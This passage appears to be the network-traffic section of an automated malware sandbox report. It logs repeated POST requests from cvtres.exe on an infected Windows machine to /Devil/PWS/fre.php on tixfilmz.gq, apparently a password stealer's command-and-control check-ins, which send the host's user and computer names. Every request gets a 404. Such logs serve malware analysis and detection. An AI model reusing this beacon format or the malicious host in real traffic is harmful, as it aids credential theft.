                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZrTeGoF3nVYrkeUhvxWoh9%2FRj%2BhzIrdJ72hwRm%2FxaYpomKIxqw1dSkapXe2%2FFFdZMPIoGcvl6mo9%2BrEob%2BGb%2BKOz8%2FDFTjZsBY8cTnoBJamVqmyew15WcilG2H%2Fhwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ec14b8790ee-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  35192.168.2.349792188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:59.404300928 CEST1272OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:59.421533108 CEST1272OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:59.501753092 CEST1273INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LWjiKYUlgHWx9Pm7GKhgqpidlITqIADQyq1TP9zHBOHabXDileoLfhOJYU89jDeWU1D%2Br5cDTxfRYL3B8GPfifjuyc8DSSD71ocPRwJOZpnoHF%2FboHrn2acvE8UDzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ec94defbbe9-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  36192.168.2.349793188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:00.645450115 CEST1274OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:00.662642956 CEST1274OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:00.737303972 CEST1275INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u1dKGquQ9Ixx8o9iJKj1wlKWK5rPFLMBf4%2FyMkIxmpMjc07V8KaBqcSKkZ4KNfyS5RxQ4J0zBYSzGTXjjjoRfC6Y7ISEYFRnMhhWIOfRQ5yilBTZD9ZKETYJbLkvmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ed10a599b69-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  37192.168.2.349794188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:01.964847088 CEST1276OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:01.981728077 CEST1276OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:02.082334042 CEST1277INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8X6KQo82dYkatS%2BcBCkdyTBkDNWeGRqdd9pSC75IbqP2uZAs2ygYPWwCHYoZqrUk2%2FKbMp1Les9sU48HHI6vyy6krxsVLeQedAFir4dZ8v1j7KvRuBSSi3r1r83bOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ed94e67902e-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  38192.168.2.349795188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:03.020333052 CEST1277OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:03.038050890 CEST1278OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:03.112765074 CEST1278INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w0m%2FfS5ISGxmLW63DwLudSt8bkBntVmSAwl1fBlZ0AsApI%2F6mm4%2FdqtsRSd5HAWP4gSmqm9Y0IShDOB%2FpEXiFJB6pDV6MV%2F1FJRhLnCOeDkja8t9ABhEPQBEZL7Blg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4edfe85bbbad-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  39192.168.2.349796188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:04.193279028 CEST1279OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:04.210558891 CEST1280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:04.301268101 CEST1280INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KtP2dy8fexlaQThIyiOsAFsHqq%2B0ttUQMUtf%2Bo%2FhUnDVInUFReffpo44QRssr5EEPVJw5ND6LgqEgv8sldjt%2FRC%2FBYUnBVXjfLNR5TtOLJKPq%2FDp2uXFfn2FX4H17Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ee73cf3908a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  4192.168.2.349746188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:17.452589035 CEST1033OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:17.469538927 CEST1034OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:17.548320055 CEST1034INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WSuTK3xmdvnC9SqK9C3Kq8XKsdf7rSOiPJ%2B%2B9ZxDB06tiwdevw3TNAATZmNMvGVEVg9KMwbf3%2BoFJ2siKx%2BGf5kYUXLsWwINIX3uVE6oCo9rZDzlcazlVHOgpMj%2Bzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dc31d919156-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  40192.168.2.349797188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:05.379364967 CEST1281OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:05.396261930 CEST1281OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:05.476572037 CEST1282INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9GykN9H5C7%2B6kWPZx2X1%2BpZinTzXp8bAAQqxyfjP6njGhWPbrJNJaRrV3nnXYbTuBLFh3TX4kkZicXXiyW5kQR%2F0ajt%2BmPUI5Kky386fZaDzStfpDzTH2G%2F%2FCKgimQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eeeaa9d9b98-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  41192.168.2.349798188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:06.576802969 CEST1283OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:06.594121933 CEST1283OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:06.684562922 CEST1284INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pGkIqTGlsgGgUzc8cR7P5DXM0Hs0xrf0h9je1L794WzRUJtN87MZfypcbWS5KD0wUcbSeNPgGa2aZHScra0ejYprzq6oZKXQPb0CAQ6BhxysZgb7gE0Cjgu1Vi9jhA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ef629a168fb-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  42192.168.2.349800188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:08.046751976 CEST1290OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:08.063824892 CEST1290OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:08.138412952 CEST1291INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hE8CEzQWdj3ptK9qhN6wg81emsfTMM%2BEqmWsHsEIHSx7zlSJOmGskVlCQQrDAtzBvBLuoUJZLgjzpSNXiyg%2FPViPlWuyFG8Xo%2BdfrVjRID5Sr1Jx61DE44vxJamumA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eff5b029b5b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  43192.168.2.349805188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:09.287220955 CEST1303OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:09.304119110 CEST1303OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:09.410331011 CEST1306INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=myILvYJYcfKS7MkYcbRG7vfOYUs1um%2Fkhr6%2BNFQpqnaIxzcDc93pXsiCMCUeiqAi3OLfzM7VZ7iHLQbmcmlQRRv0LcFVg3u%2F2o%2Fw93WkjLjKm2kg%2FB43169nVbjkFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f07191bbc01-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  44192.168.2.349811188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:10.662100077 CEST1317OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:10.680753946 CEST1317OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:10.766151905 CEST1319INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GClypDL1lKCXN2yvye0LTL8dLrQVneuX5HUY5VQrCen5Qm0qiJd%2BWTJnBJ2Trt6Htcycx%2FlEeEVgr2D%2BKJB8BaDOT6UZdLhqzLazSRJpXJRs2xehSPM2ek9AukQTlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f0fadac8fef-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  45192.168.2.349817188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:11.901227951 CEST1330OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:11.918181896 CEST1331OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:12.004159927 CEST1336INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5UewRXvDfKp%2BiAauIxctOcyUA15rOOQqfcD2aL7Td1VXhCzbbOIRwUYQfH5mwqygnMaghTVhJQxczEYISVU212%2BV9pxAhaafapkIK5nFaWBgkFiZJtv4DxF9vc83pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f1768579013-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  46192.168.2.349823188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:13.321407080 CEST1385OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:13.338433981 CEST1385OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:13.432349920 CEST1387INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pSXrIJpk6ZpMncGD3TgB%2FqwIhl6a%2B3mRqUAwGpIWSVQH0Ee29o2ZI7BeNf8YAXl9H8yVFpgu9dtwKBr3ncuE9Vsb8gki4xjrFyLXRsgELg%2FkuxWGC9uZ7LhmsOjoJw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4f204d97bb5b-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  47192.168.2.349828188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:43:14.503252029 CEST1397OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:43:14.520320892 CEST1397OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:43:14.600589037 CEST1398INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:43:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dv4%2BoOi5evPSAVQLTc2mUQ4pvvIG8rNRmP9Ln2E2L8om1gg9xOGAlvAjgzmpl572ZeTbGuweNIw7wAfKIF0DNqbFFiN7gv5L4L%2BLkuzsE4%2FCZv49vkcG%2B5zRo7T49w%3D%3D"}],"group":"cf-nel","max_age":604800}
